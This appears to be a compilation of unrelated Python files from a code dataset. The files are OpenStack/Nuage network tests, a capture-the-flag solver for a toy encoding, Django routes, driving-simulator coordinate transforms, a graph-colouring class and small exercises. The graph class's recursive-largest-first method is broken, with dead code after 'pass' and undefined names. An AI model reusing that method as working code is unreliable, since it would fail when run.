self.assertEqual(vip_mismatch, False)
@decorators.attr(type='smoke')
def test_nuage_port_update_fixed_ip_with_vm_and_conflict_with_aap_neg(
self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.assertIsNotNone(router, "Unable to create router")
# Attach subnet
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '10.0.0.10',
'mac_address': 'fe:a0:36:4b:c8:70'}]
port = self.create_port(network=network, fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.SUBNETWORK,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = [fixed_ips[0]["ip_address"],
allowed_address_pairs[0]['ip_address']]
vip_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
self.assertEqual(vip_mismatch, False)
self._create_server(name='vm-' + network['name'],
network=network, port_id=port['id'])
fixed_ips = [
{
"ip_address": "10.0.0.8",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '10.0.0.6',
'mac_address': 'fe:a0:36:4b:c8:70'}]
self.create_port(network=network, fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
# update within subnet should succeed
fixed_ips = [
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.6",
"subnet_id": subnet["id"]
}
]
# below update will fail with proper roll back
try:
self.update_port(port=port, fixed_ips=fixed_ips)
self.fail("Exception expected when updating to"
" a different subnet!")
except exceptions.BadRequest as e:
if ('Bad request: The IP Address 10.0.0.6 is'
' currently in use by subnet' in e._error_string):
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.SUBNETWORK,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
vip_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
self.assertEqual(vip_mismatch, False)
pass
else:
# Differentiate between VSD failure and update failure
LOG.debug(e._error_string)
self.fail("A different NuageBadRequest exception"
" was expected for this operation.")
@decorators.attr(type='smoke')
def test_nuage_port_create_fixed_ip_same_as_aap(self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.assertIsNotNone(router, "Unable to create router")
# Attach subnet
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
fixed_ips = [
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.6",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '10.0.0.6',
'mac_address': 'fe:a0:36:4b:c8:70'}]
port = self.create_port(network=network, fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.SUBNETWORK,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.ENABLED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = [fixed_ips[0]["ip_address"],
allowed_address_pairs[0]['ip_address']]
vip_mismatch = False
mac_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
if nuage_vport_vip['MAC'] != port['mac_address']:
mac_mismatch = True
self.assertEqual(vip_mismatch, False)
self.assertEqual(mac_mismatch, False)
@decorators.attr(type='smoke')
def test_nuage_port_update_fixed_ips_same_as_aap(self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.assertIsNotNone(router, "Unable to create router")
# Attach subnet
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '10.0.0.6',
'mac_address': 'fe:a0:36:4b:c8:70'}]
port = self.create_port(network=network, fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.SUBNETWORK,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = [fixed_ips[0]["ip_address"],
allowed_address_pairs[0]['ip_address']]
vip_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
self.assertEqual(vip_mismatch, False)
fixed_ips = [
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.6",
"subnet_id": subnet["id"]
}
]
port = self.update_port(port=port, fixed_ips=fixed_ips)
self.assertIsNotNone(port, "Unable to update port")
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.ENABLED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = [fixed_ips[0]["ip_address"],
allowed_address_pairs[0]['ip_address']]
vip_mismatch = False
mac_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
self.assertEqual(vip_mismatch, False)
if nuage_vport_vip['MAC'] != port['mac_address']:
mac_mismatch = True
self.assertEqual(vip_mismatch, False)
self.assertEqual(mac_mismatch, False)
@decorators.attr(type='smoke')
def test_nuage_port_create_fixed_ips_same_subnet_with_aap_router_attach(
self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.assertIsNotNone(router, "Unable to create router")
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '10.0.0.6',
'mac_address': 'fe:a0:36:4b:c8:70'}]
port = self.create_port(network=network, fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.L2_DOMAIN,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.L2_DOMAIN,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.ENABLED,
nuage_vport[0]['addressSpoofing'])
# Attach subnet
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.SUBNETWORK,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = ['10.0.0.4', allowed_address_pairs[0]['ip_address']]
vip_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
self.assertEqual(vip_mismatch, False)
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
@decorators.attr(type='smoke')
@testtools.skipIf(Topology.before_nuage('5.4'), 'Unsupported pre-5.4')
def test_nuage_port_update_fixed_ips_same_subnet_with_aap_router_detach(
self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.assertIsNotNone(router, "Unable to create router")
# Attach subnet
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"], cleanup=False)
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
}
]
port = self.create_port(network=network, fixed_ips=fixed_ips)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.SUBNETWORK,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
# update within subnet should succeed
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '10.0.0.6',
'mac_address': 'fe:a0:36:4b:c8:70'}]
port = self.update_port(port=port, fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
self.assertIsNotNone(port, "Unable to update port")
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
valid_vips = ['10.0.0.4', allowed_address_pairs[0]['ip_address']]
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
vip_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
self.assertEqual(vip_mismatch, False)
self.admin_routers_client.remove_router_interface(
router['id'],
subnet_id=subnet['id'])
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.L2_DOMAIN,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.L2_DOMAIN,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.ENABLED if Topology.from_nuage('5.4')
else constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
@decorators.attr(type='smoke')
@testtools.skipIf(Topology.before_nuage('5.4'), 'Unsupported pre-5.4')
def test_delete_unbound_port_with_hanging_vminterface(self):
# OPENSTACK-2797
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
port = self.create_port(network=network, cleanup=False)
self.addCleanup(self._try_delete,
self.manager.ports_client.delete_port,
port['id'])
# Find vport
l2domain = self.vsd.get_l2domain(by_subnet_id=subnet['id'])
vport = self.vsd.get_vport(l2domain=l2domain, by_port_id=port['id'])
# Create "Fake" VM interface to simulate following behavior:
# -> Port is being bound -> VM created -> port deleted ->
# Port not bound but leftover VM on VSD
vminterface = self.vsd.vspk.NUVMInterface(
name='test-fip-vm', vport_id=vport.id,
external_id=self.vsd.external_id(port['id']),
mac='E6:04:AA:7A:AA:86', ip_address='10.0.0.10')
vm = self.vsd.vspk.NUVM(name='test-port-delete-vm',
uuid='1339f7f4-f7a0-445f-b257-8dbfaf0d6fc8',
external_id=self.vsd.external_id(
'1339f7f4-f7a0-445f-b257-8dbfaf0d6fc8'),
interfaces=[vminterface])
# Impersonate tenant user for appropriate permissions on VM
self.vsd.session().impersonate(port['tenant_id'],
self.default_netpartition_name)
self.vsd.session().user.create_child(vm)
self.vsd.session().stop_impersonate()
# Delete port, VM should be deleted in this request
self.delete_port(port)
# Verify that vport is deleted
vport = self.vsd.get_vport(l2domain=l2domain, by_port_id=port['id'])
self.assertIsNone(vport, 'Vport not deleted by Port delete statement')
| StarcoderdataPython |
11324931 | from sympy import isprime, prime
solution = [1001100000110, 1001100000100, 1001100000100, 1001100000000, 1001101100010, 1001101100111, 1001101001100, 1001101001111, 1001100000111, 1001101000101, 1001101101000, 1001100000011, 1001101011001, 1001101110011, 1001101101000, 1001101110101, 1001101011110, 1001101011001, 1001100000011, 1001011001010, 1001101100101, 1001101001110, 1001101101000, 1001101110010, 1001101011001, 1001001111100, 1001100000111, 1001101010011, 1001100000100, 1001101000101, 1001101101000, 1001100000011, 1001101000101, 1001100000100, 1001101101000, 1001101000011, 1001101111111, 1001100000100, 1001101101000, 1001101100000, 1001100000100, 1001100000011, 1000101111100, 1001100000100, 1001111000110, 1001101000011, 1001101101000, 1001100001111, 1001100000111, 1001100000000, 1001100001110, 1001100000111, 1001100000000, 1001111000110, 1001100000001, 1001101001010]
chars = [chr(x) for x in range(33, 126)]
def Ord(flag):
return x0r([ord(i) for i in flag])
def x0r(listt):
ff = []
for i in listt:
if isprime(i) == True:
ff.append(prime(i) ^ 0x1337)
else:
ff.append(i ^ 0x1337)
return b1n(ff)
def b1n(listt):
ff = []
for i in listt:
ff.append(int(bin(i)[2:]))
return ff
if __name__ == "__main__":
stuff = '1337UP{'
i = len(stuff)
while True:
for c in chars:
tmp = stuff + c
encrypted = Ord(tmp)
if encrypted[i] == solution[i]:
stuff += c
break
print(stuff)
i+=1
| StarcoderdataPython |
1807276 | """bubblepopApi URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from apiapp import views as view
urlpatterns = [
url(r'^test', view.test),
url(r'^check', view.check_url),
url(r'^articles', view.find_articles),
url(r'^blacklist', view.blacklist),
url(r'^change', view.change_blacklist),
url(r'^report', view.report),
url(r'^force_crawl', view.force_crawl),
url(r'^update_media', view.update_media),
]
| StarcoderdataPython |
9625674 | <gh_stars>1-10
from typing import Tuple
import numpy as np
import cv2
CAMERA_Z_OFFSET = 1.4
CAMERA_FORWARD_OFFSET = 2.0
PIXELS_PER_METER = 5
PIXEL_OFFSET = 10 # CAMERA_FORWARD_OFFSET * PIXELS_PER_METER
# For the world map as used by the teacher (and visualization)
BIRDVIEW_OFFSET = (-80.0, 160.0)
BIRDVIEW_IMAGE_SIZE = 320
BIRDVIEW_CROP_SIZE = 192
def carla_to_opencv(carla_xyz: np.ndarray) -> np.ndarray:
return np.array([carla_xyz[..., 0], -carla_xyz[..., 2], carla_xyz[..., 1]]).T
def world_coordinate_to_ego_coordinate(
location_x: float,
location_y: float,
current_location_x: float,
current_location_y: float,
current_forward_x: float,
current_forward_y: float,
) -> Tuple[float, float]:
"""
Get the egocentric top-down coordinate of a world location relative to the current
location and orientation.
Carla uses Unreal Engine's left-handed coordinate system:
(up)
Z
^
|
|
|
|-------> X (forward)
\
\
\
v
Y (right)
This function transforms coordinates to an egocentric, right-handed, top-down
coordinate system:
(forward)
Y
^
|
|
|
|
|----------> X (right)
:param location_x: The x-component of a world location.
:param location_y: The y-component of a world location.
:param current_location_x: The x-component of the current world location.
:param current_location_y: The y-component of the current world location.
:param current_forward_x: The x-component of the vector pointing forwards according
to the current orientation.
:param current_forward_y: The y-component of the vector pointing forwards according
to the current orientation.
:return: A tuple of the egocentric top-down X and Y coordinates.
"""
dx = location_x - current_location_x
dy = location_y - current_location_y
x = current_forward_y * dx - current_forward_x * dy
y = current_forward_y * dy + current_forward_x * dx
return -x, y
def ego_coordinate_to_world_coordinate(
egocentric_x: float,
egocentric_y: float,
current_location_x: float,
current_location_y: float,
current_forward_x: float,
current_forward_y: float,
) -> Tuple[float, float]:
"""
:param location_x: The x-component of an egocentric location.
:param location_y: The y-component of an egocentric location.
:param current_location_x: The x-component of the current world location.
:param current_location_y: The y-component of the current world location.
:param current_forward_x: The x-component of the vector pointing forwards according
to the current orientation.
:param current_forward_y: The y-component of the vector pointing forwards according
to the current orientation.
:return: A tuple of the world top-down X and Y coordinates.
"""
egocentric_x *= -1
dx = current_forward_x * egocentric_y + current_forward_y * egocentric_x
dy = -current_forward_x * egocentric_x + current_forward_y * egocentric_y
x = current_location_x + dx
y = current_location_y + dy
return x, y
def ego_coordinate_to_image_coordinate(
egocentric_x: float,
egocentric_y: float,
fov: float = 90.0,
image_width: int = 384,
image_height: int = 160,
forward_offset: float = 5.4,
) -> Tuple[float, float]:
"""
Get the egocentric image (forward-viewing) coordinate of an egocentric top-down
coordinate.
:param egocentric_x: The x-component of an egocentric coordinate.
:param egocentric_y: The y-component of an egocentric coordinate.
:param fov: The camera horizontal field-of-view in degrees.
:param image_width: The image width in pixels.
:param image_height: The image height in pixels.
:param forward_offset: Relative locations close to 0 are projected outside the
camera field of view. This constant offset places such locations close to the bottom
of the frame.
:return: A tuple of the egocentric image X and Y coordinates (points are the 2D
projected points where rays shot from the point camera intersect with the ground
plane).
"""
egocentric_y += forward_offset - CAMERA_FORWARD_OFFSET
xyz = np.array([egocentric_x, CAMERA_Z_OFFSET, egocentric_y])
rotation_vector = np.array([0.0, 0.0, 0.0])
translation_vector = np.array([0.0, 0.0, 0.0])
focal_length = image_width / (2 * np.tan(fov / 360.0 * np.pi))
camera_matrix = np.array(
[
[focal_length, 0.0, image_width / 2.0],
[0.0, focal_length, image_height / 2.0],
[0.0, 0.0, 1.0],
]
)
projected = cv2.projectPoints(
xyz, rotation_vector, translation_vector, camera_matrix, None,
)
image_xy = projected[0][0][0]
return image_xy[0], image_xy[1]
def image_coordinate_to_ego_coordinate(
image_x: float,
image_y: float,
fov: float = 90.0,
image_width: int = 384,
image_height: int = 160,
forward_offset: float = 5.4,
):
"""
Project from image coordinates to world coordinates. This projection assumes the
coordinate is at the world ground (world coordinate Y = 0), and that ground is flat
and parallel to the camera.
:param image_x: The x-component of the image coordinate.
:param image_y: The y-component of the image coordinate.
:param fov: The camera horizontal field-of-view in degrees.
:param image_width: The image width in pixels.
:param image_height: The image height in pixels.
:param forward_offset: The constant offset used when projecting using
`ego_coordinate_to_image_coordinate`.
:return: A tuple of the egocentric world X and Y coordinates (X is lateral, Y is
longitudinal).
"""
central_x = image_width / 2.0
central_y = image_height / 2.0
focal_length = image_width / (2 * np.tan(fov / 360.0 * np.pi))
x = (image_x - central_x) / focal_length
y = (image_y - central_y) / focal_length
# world_z = 0.0
world_y = CAMERA_Z_OFFSET / y
world_x = world_y * x
return world_x, world_y - forward_offset + CAMERA_FORWARD_OFFSET
def world_coordinate_to_birdview_coordinate(
location_x: float,
location_y: float,
current_location_x: float,
current_location_y: float,
current_forward_x: float,
current_forward_y: float,
):
"""
Get the birdview coordinate of a world location relative to a current location and
orientation.
Based on
https://github.com/dianchen96/LearningByCheating/blob/031308a77a8ca7e9325ae909ebe04a34105b5d81/bird_view/utils/datasets/image_lmdb.py
:param location_x: The x-component of a world location.
:param location_y: The y-component of a world location.
:param current_location_x: The x-component of the current world location.
:param current_location_y: The y-component of the current world location.
:param current_forward_x: The x-component of the vector pointing forwards according
to the current orientation.
:param current_forward_y: The y-component of the vector pointing forwards according
to the current orientation.
"""
birdview_dx = (location_x - current_location_x) * PIXELS_PER_METER
birdview_dy = (location_y - current_location_y) * PIXELS_PER_METER
birdview_x = -birdview_dx * current_forward_y + birdview_dy * current_forward_x
birdview_y = BIRDVIEW_IMAGE_SIZE - (
birdview_dx * current_forward_x + birdview_dy * current_forward_y
)
birdview_x += BIRDVIEW_OFFSET[1]
birdview_y += BIRDVIEW_OFFSET[0]
birdview_x -= (BIRDVIEW_IMAGE_SIZE - BIRDVIEW_CROP_SIZE) // 2
birdview_y = BIRDVIEW_CROP_SIZE - (BIRDVIEW_IMAGE_SIZE - birdview_y) + 70
birdview_y += PIXEL_OFFSET
return birdview_x, birdview_y
| StarcoderdataPython |
380157 | try:
import networkx as nx
except Exception as e:
pass
try:
import graph_tool as gt
from graph_tool import topology
except Exception as e:
pass
class Graph:
'''
CLass for managing variety of graphing problems. We use networkx and graph_tool,
the latter of which is the default method, and includes a native coloring
algorithm.
'''
def __init__(self,
generate=True,
vertices=None,
edges=None,
verbose=False,
graph=None,
**kwargs):
if generate:
self.g = nx.Graph()
for (v,e) in edges:
self.g.add_edge(v,e)
else:
self.g = graph
def color(self,
method='gt',
strategy='largest_first',
**kwargs
):
'''
selects coloring method and strategy from various options
default is graphtools implementation
'''
if method=='greedy':
alg = greedy_color(self.g,strategy=strategy)
self.colors = {}
nc = 0
for k,v in alg.items():
try:
self.colors[v].append(k)
except Exception as e:
self.colors[v]=[k]
print(e)
nc+=1
elif method=='gt':
if strategy in ['default']:
self.alg = gt.topology.sequential_vertex_coloring(self.g)
for n,i in enumerate(self.alg.a):
try:
self.colors[i].append(n)
except Exception:
self.colors[i]=[n]
elif strategy in ['rlf']:
self.recursive_largest_first()
elif strategy in ['largest_first','lf']:
v = self.g.get_vertices()
g = self.g.get_total_degrees(self.g.get_vertices())
ordering = sorted(v,key=lambda i:g[i],reverse=True)
ord_vpm = self.g.new_vertex_property('int')
for n,i in enumerate(ordering):
ord_vpm[n]=i
alg = gt.topology.sequential_vertex_coloring(
self.g,
order=ord_vpm,
)
self.colors = {}
nc = 0
for n,i in enumerate(alg.a):
try:
self.colors[i].append(n)
except Exception:
self.colors[i]=[n]
nc+=1
def recursive_largest_first(self):
pass
'''
based on "A new efficient RLF-like algorithm for the Vertex Coloring
Problem." Adegbindin, <NAME>. 2015
note, we need to convert the graph to its complement graph, which then
can be mapped to a coloring problem
C refers to a color class under construction, with two sets: W and V,
which represent uncolored vertices and uncolored vertices with neighbors
in C. repectively. First v in U has largest number of neighbors in U.
Then, while U is not empty, find w in U with largest neighbors in W.
Then move that to C and also move neigbhors of w to W. When U is empty,
proceed to next color class.
'''
self.coloring = {}
done = False
k = -1
N = self.g.num_vertices()
N_assigned = 0
assigned = self.g.new_vertex_property('bool')
colors = self.g.new_vertex_property('int')
while N_assigned<N:
self.g.set_vertex_filter(assigned,inverted=True)
k+=1
vertices = self.g.get_vertices()
degrees = self.g.get_total_degrees(vertices)
v2i = {i:n for n,i in enumerate(vertices)}
lf = sorted(
vertices,
key=lambda i:degrees[v2i[i]],
reverse=True)
v = lf[0]
condition=True
# Cv
Nu = self.g.num_vertices()
W = self.g.new_vertex_property('bool')
Aw = self.g.new_vertex_property('int')
Au = self.g.get_total_degrees(vertices)
W[v]=1
for i in self.g.get_all_neighbors(v):
W[i]=1
Aw[i]+=1
Au[v2i[i]]-=1
assigned[v]=1
N_assigned+=1
colors[v]=k
j=0
while np.sum(W.get_array())<Nu and j<10:
j+=1
# sort according to W
# element in U: W=0
def sort_U(i):
a = (1-W.get_array()[i])
b = Aw[i]
return (a,b)
large_w = sorted(
vertices,
key=lambda i:sort_U(i),
reverse=True)
u = large_w[0]
assigned[u]=1
N_assigned+=1
colors[u]=k
neighbor_u = self.g.get_all_neighbors(u)
Aw[u]=1
W[u]=1
for i in neighbor_u:
W[i]=1
Aw[i]+=1
self.colors = {}
for n,c in enumerate(colors.get_array()):
try:
self.colors[c].append(n)
except Exception:
self.colors[c]=[n]
self.g.clear_filters()
def _find_uncolored_vertices():
pass
#iteration = 0
if self.verbose:
t0 = timeit.default_timer()
while len(self.coloring.keys())<len(N):
iteration+=1
# get Au
k+=1
Au = {}
for u in U:
Au[u]=0
for uu in U:
if uu in self.paths[u] and not u==uu:
Au[u]+=1
v = sorted(Au.items(),key=lambda k:k[1])[-1][0]
Cv,U = self._rlf_generate_Cv(v,U)
for i in Cv:
self.coloring[i]=k
if iteration%10==0:
if self.verbose:
t = timeit.default_timer()
print('Time after 10 iterations: {}'.format(t-t0))
t0 = copy(t)
def _rlf_generate_Cv(self,v,U):
'''
subroutine to geneate Cv:
'''
W = []
Cv = [v]
U.remove(v)
for u in reversed(U):
if v in self.paths[u]:
W.append(u)
U.remove(u)
while len(U)>0:
Aw = {}
for u in U:
Aw[u]=0
neighbor = self.paths[u]
for uu in W:
if uu in neighbor and not uu==u:
Aw[u]+=1
u = sorted(Aw.items(),key=lambda k:k[1])[-1][0]
Cv.append(u)
U.remove(u)
for ur in reversed(U):
if u in self.paths[ur]:
W.append(ur)
U.remove(ur)
return Cv,W[:]
| StarcoderdataPython |
1741878 | # Copyright 2015 <NAME>, S.L.
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from . import controllers
| StarcoderdataPython |
1995723 | <reponame>Crunch-io/crunchbot<filename>tests/unit/test_config_mod.py<gh_stars>1-10
from unittest import mock
import pmxbot.config_
@mock.patch('pmxbot.config', {})
def test_config_append():
"""
+= should append an item to a list
"""
pmxbot.config['foo'] = []
text = 'foo += {"a": 3, "b": foo}'
pmxbot.config_.config(None, None, None, None, text)
assert pmxbot.config['foo'][0] == {'a': 3, 'b': 'foo'}
| StarcoderdataPython |
4992693 | <gh_stars>0
"""
Exercício Python #101 - Funções para votação
Crie um programa que tenha uma função chamada voto() que vai receber como parâmetro
o ano de nascimento de uma pessoa, retornando um valor literal indicando se uma pessoa tem voto NEGADO,
OPCIONAL e OBRIGATÓRIO nas eleições.
"""
from pattern import title, end, prof
from datetime import date
title("Voting Functions")
def vote(i):
v = date.today().year - i
if v < 16:
return f"\nWith {v} years » Cannot vote."
elif v < 18 or v > 65:
return f"\nWith {v} years » Optional vote."
else:
return f"\nWith {v} years » Mandatory vote."
i = int(input("Type date of birth » "))
print(vote(i)), end(), prof()
def voto(ano):
atual = date.today().year
idade = atual - ano
if idade < 16:
return f'Com {idade} anos: NÃO VOTA.'
elif 16 <= idade < 18 or idade > 65:
return f'Com {idade} anos: VOTO OPCIONAL.'
else:
return f'Com {idade} anos: VOTO OBRIGATÓRIO.'
nasc = int(input("Em que ano você nasceu? "))
print(voto(nasc)) | StarcoderdataPython |
1788810 | import numpy as np
import pandas as pd
import pytest
from sklearn.datasets import load_boston, load_breast_cancer
from vivid.env import Settings
@pytest.fixture(scope='function', autouse=True)
def stop_logging():
before = Settings.LOG_LEVEL
Settings.LOG_LEVEL = 'WARNING'
yield
Settings.LOG_LEVEL = before
@pytest.fixture
def regression_data() -> [pd.DataFrame, np.ndarray]:
X, y = load_boston(True)
return pd.DataFrame(X), y
@pytest.fixture
def binary_data() -> [pd.DataFrame, np.ndarray]:
x, y = load_breast_cancer(True)
return pd.DataFrame(x), y
| StarcoderdataPython |
1926322 | <filename>Computer networks/socket/thread/timeout_utils.py
# <NAME> - Data - versione
import signal, os, sys
import time #sleep
import optparse
parser = optparse.OptionParser()
parser.add_option('-t', '--timeout', dest="timeout", default=2, )
parser.add_option('-s', '--sleeptime', dest="sleeptime", default=0.5, )
parser.add_option('-v', '--verbose',dest="verbose", default=False, action="store_true", )
parser.add_option('--version', dest="version", default=1.0, type="float", )
options, remainder = parser.parse_args()
N=0
def handler_alrm(signum, frame):
print('Signal handler called with signal', signum)
signal.alarm(options.timeout)
global N
# N=0
def handler_int(signum, frame):
print('Signal handler called with signal', signum)
sys.exit(0)
# Set the signal handler and a 5-second alarm
signal.signal(signal.SIGALRM, handler_alrm)
signal.signal(signal.SIGINT, handler_int)
signal.alarm(options.timeout)
ta=time.time()
while N<10:
print N
N=N+1
time.sleep(options.sleeptime)
tb=time.time()
